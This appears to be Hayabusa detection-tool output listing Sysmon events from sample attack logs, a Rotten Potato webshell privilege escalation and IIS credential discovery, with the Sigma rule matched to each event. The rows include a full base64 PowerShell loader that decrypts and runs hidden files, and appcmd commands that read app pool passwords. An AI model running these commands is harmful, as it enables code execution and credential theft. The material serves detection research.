Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.732 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,1,high,,Suspicious Process Parents,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_parents.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:00.752 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:01.864 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-26 15:48:01.864 +00:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/net_connection_win_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 2584 | PGUID: 365ABB72-3D4A-5CEB-0000-0010FA93FD00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Exec,Suspicious Encoded PowerShell Command Line,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_enc_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,Exec,Suspicious Execution of Powershell with Base64,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_encode.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,,Base64 Encoded Command Line Param Indicator,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_base64_cmdline_param.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,high,Persis,Webshell Hacking Activity Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_webshell_hacking.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:28:42.711 +00:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_sysmon/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.000 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3484 | PGUID: 365ABB72-3D6C-5CEB-0000-00107257FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.110 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2644 | PGUID: 365ABB72-3D6D-5CEB-0000-0010575CFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.190 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2104 | PGUID: 365ABB72-3D6D-5CEB-0000-00101760FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 01:29:17.270 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwAp